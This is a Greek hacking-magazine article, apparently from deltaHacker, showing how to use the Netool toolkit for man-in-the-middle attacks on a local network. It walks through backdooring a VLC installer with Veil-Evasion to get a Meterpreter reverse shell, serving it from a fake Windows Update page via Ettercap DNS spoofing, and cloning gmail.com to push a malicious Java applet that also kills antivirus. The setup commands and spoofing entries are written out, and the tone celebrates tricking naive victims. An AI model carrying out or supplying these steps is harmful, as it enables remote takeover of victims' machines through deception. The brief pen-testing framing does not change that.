Το προφίλ μας στο Google Plus
2

Αυτοματοποιημένες επιθέσεις MiTM

Για την επικινδυνότητα των επιθέσεων Man-in-the-Middle έχουμε μιλήσει αρκετές φορές στο παρελθόν. Αν και είναι εξαιρετικά δημοφιλείς και πολλά υποσχόμενες, η επιτυχία τους εξαρτάται από πολλούς παράγοντες. Ένας από αυτούς σχετίζεται με την ίδια την προετοιμασία της επίθεσης, που δεν αποτελεί καθόλου απλή υπόθεση. Μια επίθεση MiTM απαιτεί το συνδυασμό πολλών διαφορετικών εργαλείων, τα οποία δεν φημίζονται για την ευχρηστία τους. Ευτυχώς, υπάρχει ένα πρόγραμμα που αυτοματοποιεί όλη την επίπονη διαδικασία της προετοιμασίας και μας επιτρέπει να τσεκάρουμε ταχύτερα την ασφάλεια και τις αντοχές ενός συστήματος. Αναφερόμαστε στο MiTM Pentesting Opensource T00lkit.

Οι επιθέσεις Man-in-The-Middle (MiTM) πρωταγωνιστούν συχνά–πυκνά στη θεματολογία του περιοδικού. Εξάλλου, αποτελούν τις πιο δημοφιλείς επιθέσεις εντός των τοπικών δικτύων (κι όχι μόνο). Για τους νεοφερμένους, να πούμε ότι σε μια τέτοια επίθεση ο κακόβουλος χρήστης παρεμβαίνει ανάμεσα σε δύο συστήματα-συνομιλητές και υποκλέπτει όλα τα διακινούμενα δεδομένα (για την ακρίβεια δικτυακά πακέτα). Για να γίνει δυνατό κάτι τέτοιο, ο εισβολέας πραγματοποιεί μια πλαστογραφία και παρουσιάζεται σε καθέναν από τους συνομιλητές με την ταυτότητα του άλλου. Φυσικά, με την εξέλιξη των μεθόδων κρυπτογράφησης και των διαφόρων πρωτοκόλλων δικτύωσης, οι εν λόγω επιθέσεις γίνονται όλο και πιο δύσκολες. Δεν γίνονται όμως αδύνατες, ούτε απίθανες.

Όπως θα ‘χετε καταλάβει, ένα από τα πράγματα που αγαπάμε ιδιαιτέρως (εκτός από τη μελέτη της θεωρίας και τους πειραματισμούς) είναι η αυτοματοποίηση. Ακριβώς γι’ αυτό, όταν συναντήσαμε το MiTM Pentesting Opensource T00lkit (Νetool) ενθουσιαστήκαμε. Πρόκειται για μια ολόκληρη εργαλειοθήκη που περιλαμβάνει εργαλεία όπως τα Nmap, Ettercap, Sslstrip και Metasploit, ενώ αυτοματοποιεί πλήρως τις επιθέσεις MiTM στα τοπικά δίκτυα. Μη νομίζετε όμως ότι το Netool δεν μπορεί να εξαπολύσει άλλου είδους επιθέσεις. Ο σχετικός κατάλογος είναι μακροσκελής κι ενδεικτικά αξίζει να αναφέρουμε τις επιθέσεις DNS spoofing και Denial of Service στα ασύρματα δίκτυα. Κι επειδή ξέρουμε ότι έχετε ήδη ενθουσιαστεί, θα πούμε δυο λόγια για την εγκατάστασή του και θα περιγράψουμε δύο πανίσχυρες επιθέσεις.

Η εγκατάσταση
Το Netool μπορεί να εγκατασταθεί σε οποιοδήποτε σύστημα Linux, αλλά εμείς θα συνιστούσαμε τη διανομή Kali που διαθέτει όλα τα απαραίτητα προγράμματα προεγκατεστημένα. Στην περίπτωση που επιλέξετε κι εσείς το Kali Linux, τα πράγματα είναι πολύ απλά. Μπορεί να μην διατίθεται κάποιο πακέτο εγκατάστασης στα repositories του Kali, αλλά η διαδικασία είναι πανεύκολη. Αρχικά, πρέπει να κατεβάσουμε το συμπιεσμένο πακέτο που περιλαμβάνει το πρόγραμμα. Στη συνέχεια αποσυμπιέζουμε το πακέτο πληκτρολογώντας

tar -xvf opensource[kali].tar.gz

Όταν ολοκληρωθεί η αποσυμπίεση, αρκεί να εισέλθουμε στον κατάλογο opensource που θα έχει δημιουργηθεί, να καταστήσουμε εκτελέσιμο το script εγκατάστασης (INSTALL.sh) και να το τρέξουμε.

cd opensource && chmod +x INSTALL.sh && ./INSTALL.sh

Μετά κι απ’ αυτό, το Netool θα είναι έτοιμο προς χρήση. Για την εκκίνησή του πρέπει να μεταβούμε στον κατάλογο opensource και να εκτελέσουμε το script ονόματι netool.sh:

./netool.sh

Η εγκατάσταση του Netool είναι πολύ απλή και γρήγορη. Αρκεί η αντιγραφή του git repository στον υπολογιστή μας και η εκτέλεση του αρχείου INSTALL.sh με τα δικαιώματα του root.

Netool + Veil = Chaos!
Στο προηγούμενο τεύχος του deltaHacker αναφερθήκαμε σ’ ένα ενδιαφέρον εργαλείο με το όνομα Backdoor Factory (BDF). Σ’ αυτό το άρθρο θα αξιοποιήσουμε το συγκεκριμένο εργαλείο μέσω της πλατφόρμας Veil-Evasion, ενώ παράλληλα θα χρησιμοποιήσουμε και το Netool. Σκοπός της επίθεσής που θα παρουσιάσουμε είναι να φυτέψουμε στο σύστημα του θύματος ένα backdoor και συγκεκριμένα το ωραιότατο Meterpreter shell. Το “παγιδευμένο” εκτελέσιμο θα προετοιμαστεί με το BDF και τη βοήθεια του Veil-Evasion. Όσο για την παραπομπή του θύματος σε κάποιον δικό μας web server –για τη λήψη του πειραγμένου εκτελέσιμου– θα πραγματοποιήσουμε μια επίθεση DNS spoofing με το Netool. Ας πάρουμε τα πράγματα με τη σειρά.

Το βασικό μενού επιλογών του Netool περιέχει μια πληθώρα εργαλείων για την ανάλυση του δικτύου και τη διεξαγωγή επιθέσεων MiTM. Φυσικά, όλες αυτές οι λειτουργίες είναι αυτοματοποιημένες κι εμείς καλούμαστε να πραγματοποιήσουμε λίγες και απλές ρυθμίσεις.

Το Veil-Evasion υπάρχει στα repositories του Kali Linux, αλλά δεν είναι προεγκατεστημένο στη διανομή. Η προσθήκη του πραγματοποιείται εκτελώντας τα ακόλουθα:

apt-get update
apt-get install veil
cd /usr/share/veil/setup
./setup.sh

Μετά την εγκατάσταση του Veil, εκκινούμε το Netool κι επιλέγουμε τη δεύτερη επιλογή, που ανοίγει το μενού του εργαλείου Nmap. Στο παράθυρο που εμφανίζεται πρέπει να εισαγάγουμε την κάρτα δικτύου που σκοπεύουμε να χρησιμοποιήσουμε. Στη δική μας περίπτωση δώσαμε το wlan0. Αμέσως μετά εμφανίζονται οι υποστηριζόμενες λειτουργίες. Από εκεί πρέπει να επιλέξουμε την επιλογή που επιβάλλει την ανάλυση/σάρωση του τοπικού δικτύου. Όπως αντιλαμβάνεστε, αυτό που θέλουμε σ’ αυτή τη φάση είναι να μάθουμε τη διεύθυνση IP του θύματος. Μετά από λίγα δευτερόλεπτα, λοιπόν, θα ανοίξει ένα παράθυρο με τα αποτελέσματα της σάρωσης. Ανάμεσα στα μηχανήματα του τοπικού δικτύου θα βρούμε κι εκείνο του θύματος. Αντιγράφουμε τη σχετική διεύθυνση IP, κλείνουμε το παράθυρο και επιλέγουμε πάλι τη χρήση του Nmap (επιλογή 2). Αυτή τη φορά, όμως, από το παράθυρο με τις διαθέσιμες λειτουργίες επιλέγουμε την αναζήτηση ευπαθειών (επιλογή 8).

Στο νέο παράθυρο που εμφανίζεται πληκτρολογούμε τη διεύθυνση IP του θύματος και πατάμε OK. Το πρόγραμμα θα μας ρωτήσει για τις δικτυακές θύρες στις οποίες θέλουμε να επεκταθεί η αναζήτηση. Εκεί αρκεί να δώσουμε την περιοχή 1-1000 και να πατήσουμε πάλι το OK. Σε λίγα δευτερόλεπτα θα εμφανιστούν τα αποτελέσματα με αρκετές ενδιαφέρουσες πληροφορίες, όπως οι ανοικτές πόρτες και το λειτουργικό σύστημα. Για την επίθεση που εξετάζουμε, η πληροφορία που χρειαζόμαστε είναι το λειτουργικό σύστημα και θα την αξιοποιήσουμε κατά τη ρύθμιση του BDF. Στη δική μας περίπτωση, πάντως, το μηχάνημα του θύματος έτρεχε τα Windows 7 Professional. Εφόσον ο δικός μας στόχος λοιπόν έτρεχε Windows, για τη φιλοξενία του backdoor χρειαζόμασταν ένα εκτελέσιμο τύπου EXE. Σκεπτόμενοι λίγο πονηρά, επιλέξαμε το αρχείο εγκατάστασης του προγράμματος VLC και σπεύσαμε να το κατεβάσουμε. Φυσικά, εσείς μπορείτε να κατεβάσετε οποιοδήποτε εκτελέσιμο πιστεύετε ότι θα εξαπατούσε ευκολότερα το στόχο σας. Εξάλλου, αν ο δικός σας στόχος τρέχει Linux ή OS X, είναι υποχρεωτικό να στραφείτε σε κάποιο άλλο εκτελέσιμο. Όπως και να ‘χει, όταν κατεβάσουμε το εκτελέσιμο που θα μεταφέρει το backdoor, εκτελούμε το Veil-Evasion από ένα τερματικό.

veil-evasion 

Μόλις ξεκινήσει το πρόγραμμα μπορούμε να πληκτρολογήσουμε την εντολή list και να πατήσουμε [Enter], για να εμφανιστεί μια λίστα με τα διαθέσιμα payloads. Για την επίθεση που εξετάζουμε πρέπει να στραφούμε στο υπ’ αριθμόν 14, που αφορά στο BDF. Αφού το επιλέξουμε και φορτωθεί σαν το βασικό payload, πρέπει να ασχοληθούμε με τη ρύθμισή του. Στο πεδίο εντολών του Veil πληκτρολογούμε κατά σειρά τα ακόλουθα:

set LHOST δική_μας_διεύθυνση_IP 
set LPORT δικό_μας_port
set orig_exe /root/Desktop/vlc-2.1.5-win32.exe
info
generate

Το τι πετυχαίνουμε με τα παραπάνω είναι προφανές, αν και ενδέχεται να αναρωτιέστε για τις πρώτες δύο ρυθμίσεις. Βέβαια, όσοι φίλοι θυμούνται την παρουσίαση του BDF, θα καταλάβουν αμέσως περί τίνος πρόκειται. Αν η επίθεσή μας εξελιχθεί σύμφωνα με το σχέδιο, το backdoor θα ενεργοποιηθεί στο σύστημα του θύματος και θα θελήσει να συνδεθεί στο δικό μας μηχάνημα για να δεχτεί τις εντολές μας. Αυτή η σύνδεση θα επιτευχθεί με τη βοήθεια ενός Metasploit listener, που θα στήσουμε στο δικό μας σύστημα και θα περιμένει “κλήση” από το backdoor. Tα πεδία LHOST και LPORT, λοιπόν, είναι η διεύθυνση IP του μηχανήματός μας και η δικτυακή θύρα που θα δώσουμε στις ρυθμίσεις του Metasploit listener. Αφού ξεκινήσει η διαδικασία εμφύτευσης του backdoor, το BDF θα σταματήσει σε κάποια φάση και θα παρουσιάσει τα διαθέσιμα code caves. Πρόκειται για τις περιοχές του εκτελέσιμου αρχείου στις οποίες μπορεί να τοποθετηθεί ο κώδικας του backdoor. Σ’ αυτή τη φάση είναι προτιμότερο να επιλέξουμε το μεγαλύτερο code cave. Σημειώστε ότι αν το εκτελέσιμο που προκύψει από την εμφύτευση δεν είναι λειτουργικό, πρέπει να επαναλάβουμε τη διαδικασία επιλέγοντας κάποιο άλλο code cave. Προς το τέλος της διαδικασίας θα μας ζητηθεί κι ένα όνομα για το τελικό εκτελέσιμο. Λίγα δευτερόλεπτα μετά, το φαρμακωμένο εκτελέσιμο θα είναι έτοιμο :D

Μετά από τα παραπάνω πρέπει να στήσουμε έναν web server, για τη φιλοξενία του μολυσμένου εκτελέσιμου. Προς τούτο, επιστρέφουμε στην αρχική “σελίδα” του netool και επιλέγουμε το “rootsector exploits”. Από το καινούριο μενού που εμφανίζεται, επιλέγουμε το “Host a File attack”. Μόλις ξεκινήσει το script, εμφανίζονται οι τρεις ιστοσελίδες που μπορούν να κλωνοποιηθούν αυτόματα και να σερβιριστούν από τον δικό μας, τοπικό web server. Εμείς επιλέξαμε την πρώτη επιλογή, που κλωνοποιεί την ιστοσελίδα του Windows Update. Σε αυτό το σημείο, οφείλουμε να μεταφέρουμε το εκτελέσιμο με το backdoor μέσα στον κατάλογο /home και να εισάγουμε το όνομά του στο νέο παράθυρο που εμφανίζεται. Μόλις πατήσουμε ΟΚ, το πρόγραμμα θα μας ζητήσει να δώσουμε τις παραμέτρους LHOST και LPORT, όπως και τον τύπο του payload που χρησιμοποιήσαμε προηγουμένως. Όπως υποψιάζεστε, εκτός από το στήσιμο του web server, το netool θα δημιουργήσει αυτόματα και το απαιτούμενο Metasploit listener. Για να ξεκινήσουν αυτές οι εργασίες, δίνουμε ένα τίτλο στην ιστοσελίδα που θα δημιουργηθεί και πατάμε OK.

Οι παραπάνω εργασίες θα ολοκληρωθούν αρκετά γρήγορα και το netool θα εμφανίσει μια σχετική ένδειξη. Μόλις πατήσουμε [Enter], θα μεταφερθούμε στο αρχείο ρυθμίσεων etter.dns. Εκεί πρέπει να μεταβούμε στην περιοχή όπου εμφανίζεται το μήνυμα “Microsoft sucks” και να εισάγουμε τη διεύθυνση του μηχανήματος μας στις ακόλουθες παραμέτρους:

.com   A  δική_μας_διεύθυνση_IP
*.com  A  δική_μας_διεύθυνση_IP
.com  PTR δική_μας_διεύθυνση_IP

Μετά κι από αυτό πατάμε [Ctrl+O] και [Ctrl+X], για την αποθήκευση και το κλείσιμο του αρχείου. Έτσι, εμφανίζεται το παράθυρο του post exploitation module του Metasploit. Εκεί επιλέγουμε το default listener, πατάμε ΟΚ και είμαστε έτοιμοι. Η επίθεσή μας ξεκίνησε.

Αναρωτιέστε σε ποια επίθεση αναφερόμαστε; Οι ρυθμίσεις που πραγματοποιήσαμε προς το τέλος της διαδικασίας (εντός του etter.dns), αφορούν σε μια επίθεση DNS spoofing που πραγματοποιείται αυτόματα από το Netool (με τη βοήθεια του Ettercap). Μήπως τώρα αναρωτιέστε σε τι μας χρειάζεται αυτή η επίθεση; Από τη στιγμή που ξεκινά, όταν κάποιος χρήστης του τοπικού δικτύου προσπαθεί να συνδεθεί σε κάποιο site με top level domain το “.COM” θα καταλήγει να συνδεθεί στο δικό μας μηχάνημα. Εκεί θα βρίσκει τον δικό μας web server και θα βλέπει την ιστοσελίδα του Windows Update, μαζί με την προτροπή για τη λήψη μιας ενημέρωσης. Η συγκεκριμένη ενημέρωση είναι το εκτελέσιμο αρχείο με το backdoor! Αν ο χρήστης είναι άπειρος ή αφελής, το κακό δεν θα αργήσει να γίνει. Για την ενεργοποίηση του backdoor, άλλωστε, δεν χρειάζεται να πραγματοποιηθεί κάποιου είδους εγκατάσταση του προγράμματος, παρά μόνο μια απλή εκτέλεση. Αν κι όταν γίνει, ο επιτιθέμενος θα αποκτήσει ένα Meterpreter shell στο μηχάνημα του θύματος!

Στην επίθεση Host a File χρησιμοποιούμε το Veil-Evasion με σκοπό τη δημιουργία ενός εκτελέσιμου αρχείου που θα περιλαμβάνει backdoor. Στη συνέχεια φτιάχνουμε μια κλωνοποιημένη σελίδα του Microsoft Update, την οποία φιλοξενεί το δικό μας μηχάνημα, κι ανακατευθύνουμε όλη τη δικτυακή κίνηση προς τον τοπικό web server. Tα θύματα που θα καταλήξουν εκεί θα βρουν ένα κουμπί Download, για τη λήψη μιας δήθεν σημαντικής ενημέρωσης. Όσοι κατεβάσουν κι επιχειρήσουν να εφαρμόσουν την ενημέρωση, θα παραδώσουν τον έλεγχο του μηχανήματός τους σ' εμάς.

Όπως βλέπετε, αν και η επίθεση που περιγράψαμε ήταν σύνθετη από τεχνικής σκοπιάς, η υλοποίησή της ήταν αρκετά εύκολη. Το Netool απλοποίησε τη διαδικασία και αυτοματοποίησε πάρα πολλά βήματα. Ας δούμε τώρα μία ακόμα επίθεση.

Κλωνοποίηση ιστοσελίδας και επίθεση Java Applet
Η επίθεση που εξετάσαμε προηγουμένως στόχευε κατά κύριο λόγο τα συστήματα με Windows. Για αυτά τα συστήματα, άλλωστε, είναι πολύ εύκολο να βρούμε εκτελέσιμα που θα μεταφέρουν το backdoor, ενώ και οι χρήστες τους είναι πιθανότερο να είναι αρχάριοι και να εξαπατηθούν εύκολα. Μη νομίζετε ότι υποτιμάμε όλους τους χρήστες των Windows, αλλά σκεφτείτε το ανάποδα: Ξέρετε πολλούς αρχάριους χρήστες που να χρησιμοποιούν Linux; Σε αυτή την επίθεση, λοιπόν, θα μεταφέρουμε το payload με τη βοήθεια ενός Java applet. Φυσικά, θα στήσουμε και πάλι έναν web server και θα κλωνοποιήσουμε μια ιστοσελίδα για την εξαπάτηση των θυμάτων. Επιπρόσθετα, θα χρησιμοποιήσουμε ένα post exploitation script για τον αυτόματο τερματισμό του anti-virus.

Αφού ξεκινήσουμε το netool, επιλέγουμε το “rootsector exploits” και πληκτρολογούμε την κάρτα δικτύωσης που θα χρησιμοποιήσουμε. Στο μενού που εμφανίζεται επιλέγουμε το “Clone Website”. Μόλις πατήσουμε Enter για την ενεργοποίηση της επιλογής, θα χρειαστεί να εισάγουμε ορισμένα στοιχεία. Κατ’ αρχάς, πρέπει να δώσουμε τη διεύθυνση του μηχανήματός μας (LHOST), καθώς και τη σελίδα που θελουμε να κλωνοποιήσουμε. Εμείς δώσαμε το gmail.com. Αμέσως μετά καλούμαστε να δώσουμε το λεγόμενο URIPATH και το APPLETNAME. Πρόκειται για στοιχεία που χρησιμοποιούνται κατά την εξαπάτηση του θύματος και εμφανίζονται ως χαρακτηριστικά ενός δήθεν χρήσιμου Java applet. Σε αυτά τα δύο πεδία δώσαμε “support” και “microsoft” αντίστοιχα. Ακολούθως, πρέπει να δώσουμε τις διευθύνσεις IP του θύματος και του router του τοπικού δικτύου. Αν σε αυτά τα πεδία δεν δώσετε καμία διεύθυνση, η επίθεση θα πραγματοποιηθεί εναντίον όλων των χρηστών του τοπικού δικτύου. Λίγα δευτερόλεπτα αργότερα καλούμαστε να πατήσουμε [Enter], ώστε να μεταφερθούμε στις ρυθμίσεις DNS του Ettercap (αρχείο etter.dns). Όπως και στην προηγούμενη επίθεση, εντοπίζουμε την περιοχή με το μήνυμα “Microsoft sucks” και εισάγουμε στις γραμμές που ακολουθούν τη δική μας διεύθυνση IP. Με αυτόν τον τρόπο, όλες οι απόπειρες σύνδεσης σε top level domain “.COM” θα καταλήγουν στο δικό μας μηχάνημα. Όπως αντιλαμβάνεστε, σε αυτό το στάδιο μπορούμε να φερθούμε λίγο πιο πονηρά και να μην πραγματοποιήσουμε μια τόσο γενική ανακατεύθυνση. Για παράδειγμα, εμείς φροντίσαμε για την ανακατεύθυνση μόνο του gmail.com, εφόσον αυτό ακριβώς το site είχαμε κλωνοποιήσει. Αφού πραγματοποιήσουμε τις ρυθμίσεις μας εντός του αρχείου πατάμε [Ctrl+O] και [Ctrl+X], για αποθήκευση και έξοδο από τον editor. Απομένουν δύο ακόμα ρυθμίσεις. Κατ’ αρχάς, θα χρειαστεί να επιλέξουμε κάποιο payload. Για να στοχεύσουμε όλους τους χρήστες του τοπικού δικτύου και ανεξάρτητα από το λειτουργικό σύστημα, πρέπει να προτιμήσουμε το “Java payload”. Τέλος, πρέπει να καθορίσουμε αν και ποιο post exploitation module θέλουμε να χρησιμοποιηθεί. Με απλά λόγια, πρέπει να καθορίσουμε το αν θα πραγματοποιηθεί αυτόματα κάποια ενέργεια στο μηχάνημα του θύματος και ποια θα είναι. Εδώ, αν θέλουμε την απενεργοποίηση του anti-virus, μπορούμε να πληκτρολογήσουμε το “killav” και να πατήσουμε [Enter]. Αυτό ήταν όλο. Μέσα σε ελάχιστο χρόνο μία ακόμα πολύπλοκη επίθεση στήθηκε και εξαπολύθηκε.

Το dnsspoof θα μεταφέρει όσους προσπαθούν να επισκεφθούν το gmail.com στο δικό μας σύστημα και στην κλωνοποιημένη σελίδα. Εκεί θα εμφανίζεται ένα υποτιθέμενο μήνυμα ασφάλειας, που θα ζητά από τον επισκέπτη να εκτελέσει μια διαδικασία σάρωσης/επιδιόρθωσης. Όσοι είναι αφελείς ή αρχάριοι και πατήσουν στο κουμπί της ενεργοποίησης, θα μας προσφέρουν ένα ωραιότατο Meterpreter shell και το anti-virus θα απενεργοποιηθεί. Εμείς θα αποκτήσουμε πρόσβαση στο σύστημά του, ενώ αυτός θα προωθηθεί στο αληθινό Gmail και θα συνδεθεί κανονικά, αγνοώντας τα όσα συνέβησαν πραγματικά.

Μια υπερδύναμη στα χέρια μας
Μέχρι στιγμής εξετάσαμε δυο αρκετά σοβαρές επιθέσεις. Οι δυνατότητες του netool, όμως, δεν περιορίζονται σε όσα είδαμε. Όπως θα έχετε καταλάβει, το περισσότερο ενδιαφέρον συγκεντρώνεται στην επιλογή “rootsector exploits”. Πίσω από αυτήν κρύβεται ένα μεγάλο σύνολο επιθέσεων, που αποσκοπούν στην απόκτηση πρόσβασης στο μηχάνημα του στόχου. Αρκεί να σας πούμε ότι θα βρείτε μέχρι και τη δυνατότητα δημιουργίας backdoor σε αρχεία APK. Τα εν λόγω αρχεία αποτελούν κατά κάποιον τρόπο πακέτα εγκατάστασης για το Android και θα σας προτρέπαμε να δοκιμάσετε τη σχετική επίθεση, αφού είναι σχετική απλή και προσφέρει ενδιαφέροντα αποτελέσματα. Πέρα από τα “rootsector exploits”, το Netool περιλαμβάνει μια σειρά εργαλείων όπως το Ettercap, που αξιοποιείται αυτόματα στις επιθέσεις MiTM. Στο οπλοστάσιό του συγκαταλέγονται κι εργαλεία όπως το driftnet, για την υποκλοπή των εικόνων που προβάλει το θύμα στον browser του, καθώς και το sslstrip, που επιτίθεται στον browser του θύματος και προσπαθεί να απενεργοποιήσει την κρυπτογράφηση SSL. Με λίγα λόγια, το netool αποτελεί ένα υπερόπλο που αυτοματοποιεί, συνδυάζει και γενικά διευκολύνει τη χρήση πολλών άλλων εργαλείων. Οφείλουμε να είμαστε πάντοτε ενήμεροι για τα προγράμματα αυτού του είδους, όχι μόνο γιατί αποτελούν εξαιρετικά εργαλεία για το pen-testing, αλλά και για έναν λόγο παραπάνω: Για να μην επαναπαυόμαστε ποτέ και, μαζί με τον εαυτό μας, να φροντίζουμε και για την ασφάλεια των γύρω μας. Παρεμπιπτόντως, δύο άρθρα που βοηθάνε προς αυτή την κατεύθυνση βρίσκονται εδώ κι εδώ.

Stay strong and stay safe ;)

2 Responses to “Αυτοματοποιημένες επιθέσεις MiTM”

  1. georgezaf1995 | 09/04/2015 at 19:17

    Σε εμενα δεν δουλευει to dns spoof(etter.dns) Δεν κανει redirect στο pc mou

  2. |nf3rn0_MaSt3R | 11/04/2015 at 21:22

    καλα τα αυτοματα αλλα καμια φορα τα χειροκινητα ειναι πιο αποτελεσματικα… φυσικα πρεπει να τα ξερεις και τα δυο για να εχεις μεγαλυτερα ποσοστα επιτυχιας… ;)

Leave a Reply

You must be logged in to post a comment.

Σύνδεση

Αρχείο δημοσιεύσεων